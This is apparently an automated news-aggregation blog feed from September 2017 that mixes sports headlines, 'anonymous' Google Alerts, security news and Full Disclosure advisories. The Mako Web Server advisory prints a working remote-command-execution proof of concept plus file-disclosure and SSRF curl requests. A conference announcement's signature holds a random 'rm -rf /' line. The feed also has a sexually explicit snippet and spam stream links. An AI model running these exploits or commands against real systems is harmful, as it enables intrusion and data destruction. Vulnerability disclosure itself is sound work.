Latest YouTube Video

Saturday, September 16, 2017

Ravens promote RB Alex Collins from practice squad, waive RB Jeremy Langford (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ONLINE==LIVE||"""" Eels vs Cowboys 2017 Live Streaming..2017

41 mins ago - Live TV Eels vs Cowboys NRL final: Free live stream free. posted by Anonymous LIVESTREAM Eels vs Cowboys 2017 L.i.v.e..

from Google Alert - anonymous http://ift.tt/2w0ENuO
via IFTTT

Vevo Music Video Service Hacked — 3.12TB of Internal Data Leaked

OurMine is in headlines once again—this time for breaching the popular video streaming service Vevo. After hunting down social media accounts of HBO and defacing WikiLeaks website, the infamous self-proclaimed group of white hat hackers OurMine have hacked Vevo and leaked about 3.12 TB worth of internal files. Vevo is a joint venture between Sony Music Entertainment, Universal Music Group,


from The Hacker News http://ift.tt/2wiIXlK
via IFTTT

Live STream: NZ All Blacks Rugby Live Online

Posted by Anonymous 55sc on September 16, 2017. All Blacks v Springboks live stream: how to watch Rugby Championship Test, New Zealand v ...

from Google Alert - anonymous http://ift.tt/2h9CfIh
via IFTTT

Anonymous Member - Profile

Member Directory and Social Networking Tools.

from Google Alert - anonymous http://ift.tt/2h9cCTV
via IFTTT

Racists Anonymous

Racists Anonymous is a support group, based on the Alcoholics Anonymous model, which views racism almost as a mental illness. The group was ...

from Google Alert - anonymous http://ift.tt/2x37QBK
via IFTTT

Book "Order Outline" tab shows for Anonymous users

I'm working with the Books module and I cannot get the tabs "View" and "Order Outline" to disappear for anonymous users. No where else on my site ...

from Google Alert - anonymous http://ift.tt/2fpyqL0
via IFTTT

Soccer Exec Slams Feds' Anonymous Jury Bid For FIFA Trial

One of three former South American soccer executives charged in the massive FIFA corruption dragnet urged a New York federal judge Friday not to ...

from Google Alert - anonymous http://ift.tt/2xF5EB7
via IFTTT

Cassini s Final Image


As planned, the Cassini spacecraft impacted the upper atmosphere of Saturn on September 15, after a 13 year long exploration of the Saturnian System. With spacecraft thrusters firing until the end, its atmospheric entry followed an unprecedented series of 22 Grand Finale dives between Saturn and rings. Cassini's final signal took 83 minutes to reach planet Earth and the Deep Space Network antenna complex in Canberra Australia where loss of contact with the spacecraft was recorded at 11:55 UT. For the spacecraft, Saturn was bright and the Sun was overhead as it plowed into the gas giant planet's swirling cloud tops at about 70,000 miles (113,000 kilometers) per hour. But Cassini's final image shows the impact site hours earlier and still on the planet's night side, the cloud tops illuminated by ringlight, sunlight reflected from Saturn's rings. via NASA http://ift.tt/2faTEj8

Friday, September 15, 2017

Ravens: RB Kenneth Dixon issued 2nd suspension in 6 months after violating substance abuse policy (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous user 7eefb0

Name, Anonymous user 7eefb0. User since, September 15, 2017. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not ...

from Google Alert - anonymous http://ift.tt/2wi5KhN
via IFTTT

I have a new follower on Twitter


Touchdown Trophy
Always looking for the big score! Expect to find NFL news and notes on this account, and a lot of them,
Boston, MA

Following: 199 - Followers: 235

September 15, 2017 at 08:17PM via Twitter http://twitter.com/TrophyTouchdown

White House Staffers May Get Legal Fund For Russia Probe

The federal ethics agency may be opening the door for anonymous donors to pay legal fees for White House staffers. It could happen just as special ...

from Google Alert - anonymous http://ift.tt/2jvUSqv
via IFTTT

I have a new follower on Twitter


Tiffany Monroe
Social Media Enthusiast, Entrepreneur, Blogger, Traveler, Animal Lover and Lover of Life.
Florida, USA

Following: 1477 - Followers: 2559

September 15, 2017 at 04:02PM via Twitter http://twitter.com/Tiffany_Monro72

I have a new follower on Twitter


Jeff Bullas
#1 Content Marketing Influencer,Social Media Marketing Strategist & Speaker,Forbes Top 10 Social Media Influencer,#1 Global Business Blog.
Sydney, Australia
https://t.co/AwDthTHp7P
Following: 238653 - Followers: 552462

September 15, 2017 at 03:47PM via Twitter http://twitter.com/jeffbullas

[FD] ESA-2017-098: EMC Data Protection Advisor Hardcoded Password Vulnerability

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Updated advisory for CVE-2017-8769 - WhatsApp Issues with Media Files

*** The vendor has addressed these issues and we updated our advisory accordingly *** [Original post here: http://ift.tt/2pVKCGC] SUMMARY WhatsApp Messenger for Android does not delete sent and received files from the SD card on the device when chats are cleared, deleted or the application is uninstalled from the device. Additionally, the application stores sent and received files in the SD card without encryption where they are accessible to any applications with storage permissions. The vendor (Facebook) doesn’t consider these to be security issues and does not plan to fix them. MITRE has assigned CVE-2017-8769 for these issues. It is also unclear whether platforms other than Android are affected. [UPDATE: 09/06/2017 – a recent update to WhatsApp for Android now displays an option to delete media files when deleting chats and that option is checked by default. The change to the UI mitigates the issues discussed in this advisory. Users are encouraged to update to v2.16.323 or later.] BACKGROUND WhatsApp Messenger is a popular cross-platform communication tool that allows users to send and receive messages without using more expensive protocols like SMS. Additionally the application allows sending and receiving of files including audio, contacts, images, videos and arbitrary documents. It is estimated that WhatsApp has over 1 billion active users and it is owned by Facebook, which also operates the largest social networking site in the world. One of the main selling points that WhatsApp makes is their commitment to user privacy which revolves around the implementation of end-to-end encryption via the Signal protocol originally developed by Open Whisper Systems. This encryption makes it impossible for Facebook to monitor and capture message traffic flowing between users. In some extreme cases, Facebook executives have been placed in jail for the failure to allow access to messaging data when requested by governments. Because of the high expectation of privacy by WhatsApp user, it is important that the security of the application on the device is also properly implemented. In regards to messages, WhatsApp stores them in encrypted database but it fails to do the same for files. WhatsApp also does not clear files received or sent by the user when the chats are cleared. This can result in user data being leaked or stolen by malicious applications, law enforcement during illegal searches or unwanted actors having access to the device (“evil maid scenario”). DETAILS As mentioned above, WhatsApp has ability to send and receive files in addition to regular messages. This functionality includes arbitrary documents from the file system, contacts, location information, and various type of multimedia files including two separate audio formats (voice notes and recordings), images and videos. There is also more recent functionality around “status” images which disappear after 24 hours. In order for WhatsApp to access the SD card, users must grant storage permissions but in practice most users do so in order to be able to exchange files. In our research, we have found that WhatsApp for Android stores these files on the SD card where they are accessible to other applications and does not delete them when chats are cleared, deleted or the application is uninstalled. Both sent and received files are retained. They are retained on the SD card in the following folder: - /WhatsApp/Media/ We have observed that the following file types are retained and not deleted: - /WhatsApp/Media/.Statuses/ - /WhatsApp/Media/WhatsApp Audio/ - /WhatsApp/Media/WhatsApp Documents/ - /WhatsApp/Media/WhatsApp Images/ - /WhatsApp/Media/WhatsApp Video/ - /WhatsApp/Media/WhatsApp Voice Notes/ To replicate the issue: 1. Install WhatsApp for Android. 2. Login and exchange messages with another user that contain any of the file type listed above. 3. Then, install any file manager for Android. 4. Navigate to the SD card, and observe the files sent and received being located in the directories described above. As the next step, try to delete a chat by tapping on the chat, holding until the delete option comes up. Delete the chat, and go back to the file manager to check. As the next step, try going to “Settings”, “Chats”, “Chat History” and selecting either “Clear all chats” or “Delete all chats”. Go back to the file manager and observe the media files still being present. As the next step, uninstall WhatsApp. Go back to the file manager, and observe the media files still being there. All testing was done on Android 7, and WhatsApp Messenger v2.17.146. It is unclear whether other platforms are affected. VENDOR RESPONSE AND MITIGATION STEPS The vendor (Facebook) doesn’t consider these to be security issues and has no plans to fix them. Vendor response is as follows:

Source: Gmail -> IFTTT-> Blogger

[FD] stack buffer overflow in openexif 2.1.4

[FD] Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities

[+] SSD Beyond Security: http://ift.tt/2wxq2k4 [+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2y5zRpK [+] ISR: ApparitionSec Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in Mako Server’s tutorial page. The vulnerabilities found are: Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution Unauthenticated File Disclosure Unauthenticated Server Side Request Forgery As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues. “As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.” Credit An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program Vendor response RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory, saying: “I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place. Internally I need to set-up a cost allocation account for billing against these support inquiries.” At this time it’s unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed. Vulnerabilities details Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution: Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to ‘save.lsp‘ web page, the input passed to a function responsible for accessing the filesystem. The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to ‘manage.lsp‘ HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1' HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua ' Proof of Concept import urllib2,time #MakoServer v2.5 Remote Command Execution 0day #Credits: John Page AKA hyp3rlinx #========================================= print 'MakoServer v2.5 Remote Command Execution' CMD="os.execute('c:/Windows/system32/calc.exe')" opener = urllib2.build_opener(urllib2.HTTPHandler) request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD) request.add_header('Content-Type', 'text/plain;charset=UTF-8') request.add_header('X-Requested-With', 'XMLHttpRequest') request.add_header('Referer', 'http://localhost/Lua-Types.lsp') request.get_method = lambda: 'PUT' opener.open(request) time.sleep(1) urllib2.urlopen('http://IP/examples/manage.lsp?execute=true&ex=2.1&type=lua ') Unauthenticated File Disclosure Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed without modification and the response with the file content is returned. Proof of Concept The following GET request will response with the C/Windows/system.ini content: curl -v http://VICTIM-IP/fs/C/Windows/system.ini * About to connect() to VICTIM-IP port 80 * Trying VICTIM-IP... connected * Connected to VICTIM-IP (VICTIM-IP) port 80 > GET /fs/C/Windows/system.ini HTTP/1.1 > User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 > Host: VICTIM-IP > Accept: */* > < HTTP/1.1 200 OK < Date: Mon, 07 Aug 2017 22:21:27 GMT < Server: MakoServer.net < Content-Type: application/octet-stream < Accept-Ranges: bytes < Etag: 58b4be20 < Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT < Content-Length: 219 < Keep-Alive: Keep-Alive ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] Server Side Request Forgery Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the ‘rtl/appmgr/new-application.lsp‘ URI, the input will be executed and the server will connect to the attacker’s machine. Proof of Concept Start Wireshark to see successful connections made from Mako Web Server victim machine. Initiate requests from another machine using CURL: curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ==================== Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability. More details can be found on their blog at: http://ift.tt/2wxq2k4 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] Exploit toolkit for CVE-2017-8759 - Microsoft .NET Framework RCE (Builder + listener + video tutorial)

# Exploit Title: Exploit toolkit for CVE-2017-8759 - Microsoft .NET Framework RCE (Builder + listener + video tutorial) # Date: 14/09/2017 # Exploit Author: Bhadresh Patel # Version: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 # CVE : CVE-2017-8759

Source: Gmail -> IFTTT-> Blogger

[FD] BSides Roma

Good Morning, i’m really happy and excited to announce the BSides Roma event, the first one in Italy. Check it out here for tickets: https://www.eventbrit http://ift.tt/2jwqxbn CFP: http://ift.tt/2wRI81X Will be in Roma, @ 13 Jan 2018, so if you are interested let me know. We are also looking for sponsors so, if interested, you can check it out the details here: http://bit.ly/BSidesRoma_Sponsor_Item See you in Roma for a beer, and drop me a few lines if you want more information. Greetings AP [ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo "You live"

Source: Gmail -> IFTTT-> Blogger

Ravens can match 72-year-old feat by pitching second straight shutout on Sunday - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Flix Anonymous - Episode 42

Trev and Steve review the new film releases of the week like the Darren Aronofsky's twisted flick Mother! and they spill the beans about a new action ...

from Google Alert - anonymous http://ift.tt/2yd9mi2
via IFTTT

I have a new follower on Twitter


NFL Fandom
Fans of the world's greatest sport. Sundays in the fall; nothing is better.
Richmond, VA

Following: 175 - Followers: 211

September 15, 2017 at 08:42AM via Twitter http://twitter.com/NFL_Fandom

I have a new follower on Twitter


Salt Life
Surfing, Fishing, Diving, or just enjoying a day on the beach, we all have one thing in common - the ocean and all it has to offer. https://t.co/JDz8v9OadF
LIVE THE SALT LIFE
https://t.co/PjcPxzvGhL
Following: 27694 - Followers: 54601

September 15, 2017 at 08:42AM via Twitter http://twitter.com/RealSaltLife

(Answered) Ajax link for anonymous users to delete node they created if $_SESSION exists. Is ...

I'm allowing anonymous users the ability to create nodes using a form. But I want to allow them the ability to delete them again straight away.

from Google Alert - anonymous http://ift.tt/2xph62z
via IFTTT

Yet Another Android Malware Infects Over 4.2 Million Google Play Store Users

Even after so many efforts by Google, malicious apps somehow managed to fool its Play Store's anti-malware protections and infect people with malicious software. The same happened once again when at least 50 apps managed to make its way onto Google Play Store and were successfully downloaded as many as 4.2 million times—one of the biggest malware outbreaks. Security firm Check Point on


from The Hacker News http://ift.tt/2ybfmbb
via IFTTT

75,000 Turks Arrested So Far for Downloading Encrypted Messaging App

WARNING: If you are Turkish and using or have installed ByLock—a little-known encrypted messaging app—you could be detained by Turkish authorities. You might be thinking why??? Because using this app in Turkish is illegal since last year. The background story begins here... Remember the deadliest Turkey's failed coup attempt? <!-- adsense --> In July 2016, a section of the Turkish military


from The Hacker News http://ift.tt/2jvc932
via IFTTT

Anonymous os iso download

Anonymous os iso download. iso free download. OS LiveCD - Anonym. Limone101. You can create the LiveUSB with Click the Browse button under ...

from Google Alert - anonymous http://ift.tt/2yb4SZk
via IFTTT

Free anonymous surfing

If you want to encrypt your whole internet connection and enjoy all 25 Oct 2014 One such precaution is the use of anonymous web surfing. Surf the ...

from Google Alert - anonymous http://ift.tt/2weJOUz
via IFTTT

100 Steps Forward


A beautiful conjunction of Venus and Moon, human, sand, and Milky Way is depicted in this night skyscape from planet Earth. The scene is a panorama of 6 photos taken in a moment near the end of a journey. In the foreground, footsteps along the wind-rippled dunes are close to the Huacachina oasis in the southwestern desert of Peru. An engaging perspective on the world at night, the stunning final image was also chosen as a winner in The World at Night's 2017 International Earth and Sky Photo Contest. via NASA http://ift.tt/2wYuhaU

Thursday, September 14, 2017

I have a new follower on Twitter


Pigskin Pride
Love all things football! I cannot get enough of the world's best sport. 25 year old graduate of Alabama #RollTide
Tuscaloosa, AL

Following: 168 - Followers: 190

September 14, 2017 at 09:17PM via Twitter http://twitter.com/PigskinParties

▶ Jeremy Maclin says Joe Flacco "as advertised," the pair has already developed strong chemistry (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


ConferTel
ConferTel provides a range of event driven communications applications, including fully managed webinar services, secure audio and web conferences
Carlsbad, California
http://t.co/o1iIAoQ7qY
Following: 1822 - Followers: 1201

September 14, 2017 at 03:57PM via Twitter http://twitter.com/ConferTel

New Book - Anonymous

Anonymous Drunk or Drug Fueled Confessions Wanted for My New Book I am putting together a collection of true stories from anonymous people all ...

from Google Alert - anonymous http://ift.tt/2jtnhxv
via IFTTT

Ravens place RB Danny Woodhead (hamstring) on IR, sign RB Jeremy Langford off practice squad (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Windows 10 to Give More Control Over App-level Permissions

Microsoft has been gradually changing its privacy settings in Windows 10 with the Fall Creators Update to give its users more controls over their data. In April, Microsoft addressed some initial privacy concerns in the Windows 10 Creators Update with simplified data collection levels—Security, Basic, Enhanced, and Full—and eventually revealed its data collection practices. Now, the software


from The Hacker News http://ift.tt/2xmxroF
via IFTTT

[FD] SEC Consult SA-20170914-1 :: Persistent Cross-Site Scripting in SilverStripe CMS

SEC Consult Vulnerability Lab Security Advisory < 20170914-1 > ======================================================================= title: Persistent Cross-Site Scripting product: SilverStripe CMS vulnerable version: <=3.5.3 fixed version: 3.6.1 impact: Medium homepage: http://ift.tt/2b6Qbjw found: 2017-03-15 by: S. Tripathy (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

[FD] SEC Consult SA-20170914-0 :: Authenticated Command Injection in Ubiquiti Networks UniFi Cloud Key

SEC Consult Vulnerability Lab Security Advisory < 20170914-0 > ======================================================================= title: Authenticated Command Injection product: Ubiquiti Networks UniFi Cloud Key vulnerable version: Firmware version <=0.6.4 fixed version: Firmware version >=0.6.9 CVE number: - impact: High homepage: https://www.ubnt.com found: 2017-03-26 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw

The massive Equifax data breach that exposed highly sensitive data of as many as 143 million people was caused by exploiting a flaw in Apache Struts framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. Credit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a


from The Hacker News http://ift.tt/2fkOyxD
via IFTTT

8th Street, Ocean City, MD's surf is at least 5.71ft high

Maryland-Delaware, September 20, 2017 at 04:00AM

8th Street, Ocean City, MD Summary
At 4:00 AM, surf min of 5.71ft. At 10:00 AM, surf min of 5.17ft. At 4:00 PM, surf min of 4.25ft. At 10:00 PM, surf min of 3.13ft.

Surf maximum: 6.72ft (2.05m)
Surf minimum: 5.71ft (1.74m)
Tide height: 0.77ft (0.23m)
Wind direction: W
Wind speed: 8.71 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Wednesday, September 13, 2017

OEG to allow anonymous donations to Political defense funds

The U.S. Office of Government Ethics has quietly reversed its own internal policy prohibiting anonymous donations from lobbyists to White House ...

from Google Alert - anonymous http://ift.tt/2wXCBYy
via IFTTT

New Light Shed on Case of Missing Fordyce Mom Thanks to Anonymous

FORDYCE, Ark.- An anonymous phone call sheds new light in the case of a missing Fordyce mother of seven. A missing person poster greets ...

from Google Alert - anonymous http://ift.tt/2jqMI2J
via IFTTT

Ravens: John Harbaugh looks to remain undefeated at home vs. rookie QBs - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Spirit Sand Anonymous

Spirit Sand Anonymous. By Patrick Shannon. For when you're more intrigued by the sun's rise than the night's moon. 53 songs. Play on Spotify. 1.

from Google Alert - anonymous http://ift.tt/2f7CCSO
via IFTTT

Feyenoord vs Manchester City Live Streaming

Feyenoord vs Man City LIVE score and goal updates Manchester Evening News · 56 mins ago Feyenoord vs Man City FREE: How can I watch ...

from Google Alert - anonymous http://ift.tt/2xyBu2f
via IFTTT

Ravens: Joe Flacco says he's not 100% but will have "no limitations" Sunday vs. Browns (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: John Harbaugh says Ray Lewis should be elected to HOF on first ballot; "agenda" if not (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: Michael Campanaro could fill Danny Woodhead's role - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: RB Danny Woodhead (hamstring) will miss at least 4 weeks, says John Harbaugh (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Fivestar with comments that need approval removes all anonymous user comments upon approval

Problem/Motivation When you have fivestar on a comment and you have comment approval needed then your rating isn't added to the votingapi ...

from Google Alert - anonymous http://ift.tt/2wZdYZ1
via IFTTT

Ravens put perfect home mark vs. rookie QBs on line against DeShone Kizer - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Zerodium Offers $1 Million for Tor Browser 0-Days That It will Resell to Governments

It seems like Tor Browser zero-day exploits are in high demand right now—so much so that someone is ready to pay ONE MILLION dollars. Zerodium—a company that specialises in acquiring and reselling zero-day exploits—just announced that it will pay up to USD 1,000,000 for working zero-day exploits for the popular Tor Browser on Tails Linux and Windows operating system. Zero-day exploit


from The Hacker News http://ift.tt/2f5zxCN
via IFTTT

Immediately Patch Windows 0-Day Flaw That's Being Used to Spread Spyware

Get ready to install a fairly large batch of security patches onto your Windows computers. As part of its September Patch Tuesday, Microsoft has released a large batch of security updates to patch a total of 81 CVE-listed vulnerabilities, on all supported versions of Windows and other MS products. <!-- adsense --> The latest security update addresses 27 critical and 54 important


from The Hacker News http://ift.tt/2vTG9qV
via IFTTT

8th Street, Ocean City, MD's surf is at least 6.73ft high

Maryland-Delaware, September 19, 2017 at 04:00AM

8th Street, Ocean City, MD Summary
At 4:00 AM, surf min of 6.73ft. At 10:00 AM, surf min of 5.56ft. At 4:00 PM, surf min of 4.19ft. At 10:00 PM, surf min of 4.45ft.

Surf maximum: 8.04ft (2.45m)
Surf minimum: 6.73ft (2.05m)
Tide height: 1.44ft (0.44m)
Wind direction: NE
Wind speed: 27.8 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] SEC Consult SA-20170913-1 :: Local File Disclosure in VLC media player iOS app

SEC Consult Vulnerability Lab Security Advisory < 20170913-1 > ======================================================================= title: Local File Disclosure product: VLC media player iOS app vulnerable version: 2.7.8 fixed version: 2.8.1 CVE number: - impact: Medium homepage: http://ift.tt/1QGisdw found: 2017-08-22 by: Ahmad Ramadhan Amizudin (Office Malaysia) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

[FD] SEC Consult SA-20170913-0 :: Multiple Vulnerabilities in IBM Infosphere Information Server / Datastage

SEC Consult Vulnerability Lab Security Advisory < 20170913-0 > ======================================================================= title: Multiple Vulnerabilities product: IBM Infosphere Information Server / Datastage vulnerable version: 9.1, 11.3, and 11.5 (including Cloud version 11.5) fixed version: - CVE number: CVE-2017-1495, CVE-2017-1468, CVE-2017-1383, CVE-2017-1467 impact: Critical homepage: http://ift.tt/1t309zW found: 2017-03-16 by: Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Linux Subsystem on Windows 10 Allows Malware to Become Fully Undetectable

Microsoft has been expressing its love for Linux for almost three years now, and this love costs Microsoft an arm and a leg. Last year, Microsoft surprised everyone by announcing the arrival of Windows Subsystem for Linux (WSL) in Windows 10, which brings the Linux command-line shell to Windows, allowing users to run native Linux applications on Windows system without virtualization. However


from The Hacker News http://ift.tt/2woVXBD
via IFTTT

Tuesday, September 12, 2017

To the click handler add an empty anonymous function so that you can add code to it later.

//Prevent spoilerphobes from seeing spoilers //Solution: Hide spoilers and reveal them through user interaction //1, Hide spoiler $(".spoiler ...

from Google Alert - anonymous http://ift.tt/2f3QjlZ
via IFTTT

Post review for anonymous, save as draft or save unpublished

I have a form that allow anonymous user to send a job offer. Everything working fine but I don't want users to be able to publish node on the spot.

from Google Alert - anonymous http://ift.tt/2y3W5sm
via IFTTT

I have a new follower on Twitter


Jason Allen

Washington D.C.

Following: 3580 - Followers: 307

September 12, 2017 at 09:17PM via Twitter http://twitter.com/JLHDU

Ravens: Danny Woodhead (hamstring) out 6-8 weeks - Adam Schefter (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Original text

Live(Soccer-Tv)//.. Juventus vs Barcelona 2017 Live Stream Free Barcelona vs. Juventus live stream info, TV channel: How to watch Champions ...

from Google Alert - anonymous http://ift.tt/2wVJ0TZ
via IFTTT

Ravens-Browns recent history could mean closer game than 7.5-point spread - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Merging anonymous activity with a lead created

Hi, I am wondering if anonymous activity that occurred before a lead was created will be merged with a known lead when that lead is added to Marketo ...

from Google Alert - anonymous http://ift.tt/2y3evJH
via IFTTT

8th Street, Ocean City, MD's surf is at least 6.73ft high

Maryland-Delaware, September 18, 2017 at 04:00PM

8th Street, Ocean City, MD Summary
At 4:00 AM, surf min of 4.1ft. At 10:00 AM, surf min of 4.45ft. At 4:00 PM, surf min of 6.73ft. At 10:00 PM, surf min of 8.07ft.

Surf maximum: 8.04ft (2.45m)
Surf minimum: 6.73ft (2.05m)
Tide height: 2.11ft (0.64m)
Wind direction: NNE
Wind speed: 17.2 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Can I make all attendees anonymous to the presenter and other attendees?

trying to use this as a tool to generate feedback about sensitive topics.

from Google Alert - anonymous http://ift.tt/2w6xeqA
via IFTTT

Clumsy Anonymous, Smallzy in LA, The best thing you've climbed

Lewis & Lowe with Hayley. Lewis and Lowe with Hayley, 6-9am weekdays on Nova. If you miss any of the fun, don't stress it, you can always ...

from Google Alert - anonymous http://ift.tt/2jljrWV
via IFTTT

Ravens: Terrell Suggs showing no signs of age slowing him down - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking

If you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side. Security researchers have just discovered total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices—from


from The Hacker News http://ift.tt/2eTzFSa
via IFTTT

Ravens climb seven spots to No. 14 in Week 2 NFL Power Rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous Ass Up Garage Fuck

Lubed hole waiting in the dark for anonymous loads. Dark/anonymous/discreet only. No names, no faces, no talking. Slide in, pump n go. I'm open to ...

from Google Alert - anonymous http://ift.tt/2wU14OE
via IFTTT

[FD] SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting

SEC Consult Vulnerability Lab Security Advisory < 20170912-0 > ======================================================================= title: Email verification bypass product: SAP E-Recruiting vulnerable version: 605, 606, 616, 617 fixed version: see SAP security note number 2507798 impact: medium homepage: https://www.sap.com found: 2017-07-12 by: Marc Nimmerrichter (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Spa manager in Yarm (TS15) | Anonymous Recruiter

View details and apply for this spa manager job in Yarm (TS15) with Anonymous Recruiter on totaljobs. DO YOU HAVE MANAGERIAL EXPERIENCE ...

from Google Alert - anonymous http://ift.tt/2xuKkhC
via IFTTT

Apache Struts 2 Flaws Affect Multiple Cisco Products

After Equifax massive data breach that was believed to be caused due to a vulnerability in Apache Struts, Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts2 web application framework. Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and used by 65 percent of the


from The Hacker News http://ift.tt/2feZfl9
via IFTTT

Comments

If I use this module on an HTTPS website while I'm logged in (admin or normal user) it works as a charm, but if I try it as a not logged user, in console ...

from Google Alert - anonymous http://ift.tt/2wX8dN4
via IFTTT

Samsung Launches Bug Bounty Program — Offering up to $200,000 in Rewards

With the growing number of cyber attacks and data breaches, a number of tech companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded. Samsung is the latest in the list of tech companies to launch a bug bounty program, announcing that the South Korean electronics


from The Hacker News http://ift.tt/2h0lJGB
via IFTTT

[FD] How Apple fixed my 2008's hole in their browser after 9 years

